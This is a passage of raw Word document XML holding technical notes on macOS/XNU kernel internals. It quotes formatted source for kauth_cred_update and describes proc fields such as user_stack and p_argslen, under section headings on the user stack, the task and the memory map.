          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"kauth_cred_update(cache hit): %p -&gt; %p\n"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> old_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> foun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Found a match so we bump reference count on new</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one and decrement reference count on the old one.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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ref</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>foun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destroy_it </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kauth_cred_unref_hashlocked</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ol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HASH_UNLOCK</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destroy_it </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TRUE</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assert</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">old_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NO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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_MACF</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mac_cred_label_destroy</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ol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endif</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AUDIT_SESSION_UNREF</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ol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old_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cr_ref </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color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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FREE_ZONE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>old_cre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sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>old_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> M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old_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NO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lastRenderedPageBreak/>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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>foun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Must allocate a new credential using the model.  also</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2457" w:rsidRPr="00AA2457" w:rsidRDefault="00AA2457" w:rsidP="00AA2457">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         * adds the new credential to the credential hash table.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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new_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kauth_cred_dup</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>model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err </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> kauth_cred_add</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HASH_UNLOCK</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* retry if kauth_cred_add returns non zero value */</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">err </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color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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break</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> CONFIG_MACF</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mac_cred_label_destroy</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color w:val="008000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</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AUDIT_SESSION_UNREF</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FREE_ZONE</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sizeof</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r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> M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new_cred </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> NULL</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    DEBUG_CRED_CHANGE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"kauth_cred_update(cache miss): %p -&gt; %p\n"</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> old_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> new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kauth_cred_unref</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>old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sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new_cred</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2457" w:rsidRPr="00AA2457" w:rsidRDefault="00AA2457" w:rsidP="00AA2457">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA2457">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F12705" w:rsidRPr="00805F86" w:rsidRDefault="00F12705" w:rsidP="00220FEC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F64136" w:rsidRDefault="00F64136" w:rsidP="00F64136">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc445313240"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User stack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00F64136" w:rsidRDefault="00D10DC4" w:rsidP="00F64136">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidR="00F64136" w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F64136" w:rsidRPr="00F64136">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>user_stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64136" w:rsidRPr="00655847" w:rsidRDefault="007B5C81" w:rsidP="00655847">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* where user stack was allocated */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64136" w:rsidRDefault="00F64136" w:rsidP="00F64136">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10DC4">
        <w:t xml:space="preserve">&lt;proc_structure&gt;. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F64136">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>p_argslen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64136" w:rsidRPr="00220FEC" w:rsidRDefault="00F64136" w:rsidP="00F64136">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     p_argc</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="00220FEC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* saved argc for sysctl_procargs() */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64136" w:rsidRDefault="007B5C81" w:rsidP="007B5C81">
      <w:r>
        <w:t>user_stack and p_argslen are used to recover where the args and environment arrays</w:t>
      </w:r>
      <w:r w:rsidR="00655847">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A1196" w:rsidRPr="006B4005" w:rsidRDefault="001A1196" w:rsidP="001A1196">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc445313241"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="001A1196" w:rsidRPr="00F64136" w:rsidRDefault="001A1196" w:rsidP="001A1196">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F64136" w:rsidRPr="006B4005" w:rsidRDefault="00D10DC4" w:rsidP="00F64136">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc445313242"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Memory map</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425" w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_map_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
